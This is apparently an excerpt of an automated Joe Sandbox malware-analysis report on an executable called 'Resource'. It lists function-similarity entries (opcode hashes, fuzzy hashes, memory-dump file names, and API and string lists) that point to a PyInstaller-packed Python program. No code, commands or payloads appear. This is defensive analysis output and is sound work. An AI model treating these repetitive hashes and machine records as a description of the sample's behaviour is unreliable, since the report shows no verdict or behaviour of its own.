                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                              • Instruction ID: 29735704f70c48714956ab998c89230a75daeebaed57d01f4222bb2ec496b3ca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A518037A2866186E7248B29D14033D37A0EB59F68F249131CE8D977A8CF3BE843C745
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                              • Instruction ID: f64ee5d0f2d14c4412f3ebd9eeef38d4bbde1ecad13d103863ff3a1018d37ef7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49517F37A286A186E7248B29C14833837A1EB49F58F248171CE4D977ACCF3BE953C745
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                              • Instruction ID: d748cbdd054b108fe521dcec21b3516493f2917c30a32ab714d284d5ade30fab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01514E37A3866186E7258B29C24033927A1EB59B58F288531CB4DA7798CF3BEC53C745
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                              • Instruction ID: 022a65c4f2b1f40e0defa59ee6acf4e6fa11d91c538d02667948e7d34116820c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72519037A2866186E7248B29D15833C37A1EB49B58F248171CE4D9779CDF3BE843C785
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                              • Instruction ID: fbeba23d3db295622b5bd2f298dda6011dcca268fe8944b3d9251f097886a003
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1641CE53879BAF44E9A28D1907007B56A80EF22BA0D58D3F4DD99973DFCC0F2587820B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                                              • Opcode ID: ebc62af25f4a924abe1fa2d5abdeed76b263ad9941eeccbef4e1511c1356119b
                                                                                                                                                                                                                                                              • Instruction ID: f51cf89ddba5a82f3549a2e5956e86c27a7e015e6222166243e091a619b6bc8c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebc62af25f4a924abe1fa2d5abdeed76b263ad9941eeccbef4e1511c1356119b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8041E573724A6582EF14CF2ADA1826963A1E748FD0B099036DE0DC7B58DE3ED5868304
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
                                                                                                                                                                                                                                                              • Instruction ID: 7a0b0bc3934776725a9ac2b0b1e68f924d551062baa37db2d8d8966cd43ef9db
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C31EB33719B5241E765DF25B54037D6AD5AB84BD0F048238EA4E977DADF3ED0018309
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                                                                                                                                                                                                                              • Instruction ID: 8634869f8cad379936c93f6716d95d2e662f3dc690bd477bf67c0d4331b3198b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F068727282758ADB948F29A50272977D0F7483C0F80C079D58DC3F14DA3E90508F09
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                                                                                                                                                                                                                              • Instruction ID: 40c65f10c780ad11871ad7ec2c52e03b0c90472192a6b3e97f7b00b3e74adfb5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50A0023392CC66D0E6848B14EA542742330FB51341BA10031D80EC50A0DF3FE541C31A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                                                                              • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                              • API String ID: 190572456-4266016200
                                                                                                                                                                                                                                                              • Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                                                                                                                                                                                                                              • Instruction ID: 27979b58e5879f0ec2b050aacbbc91206dd77aa6812eb625a56ddf0ca1169d27
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D12E97696AB2381FA55CB04EA5037423A1BF45781B985535C81FCA3A0FF7FA849C31E
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message_fread_nolock
                                                                                                                                                                                                                                                              • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                                                                                                              • API String ID: 3065259568-2316137593
                                                                                                                                                                                                                                                              • Opcode ID: 80c1ceb522335a453d73f94936c28ade423db0aeb6dc10fc023faf92f2617520
                                                                                                                                                                                                                                                              • Instruction ID: 8723710f76a60efb8bf95f34bbddd8607814bffbde3bfbecedb58375ae7b9448
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80c1ceb522335a453d73f94936c28ade423db0aeb6dc10fc023faf92f2617520
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B51D433B286A345EA20A711AA547FA2394EF447C8F504431EE4EC7B89EF7FE5458309
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                              • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                                                              • Instruction ID: dc478b1073bde944cea381896430ce3703c1c1c14d4dbe1aa692c5027a9002fa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4851E736618BB186D6249F26B4182BAB7A1F798BA1F004131EFDF83694DF3DD085DB14
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                              • Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                                                                                                                                                                                                                              • Instruction ID: 7245e8c267093bb642229e8edb352aed462d1bbecb6b5e32dd62349f984bcbd6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7512B563E3C96386FB209B14E2547B976A1EB40754F94C535E689876CCDF3FE4808B0A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                              • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                                                              • Instruction ID: c4be31f58000290f9548a758f78d5f0fa31b45fc6f4755d3ba080e177eae1680
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E128173E2C16385FB209A14E25C77A7261FB40754F848175D69A876CCDF7FE9808B0A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                              • API String ID: 2030045667-3659356012
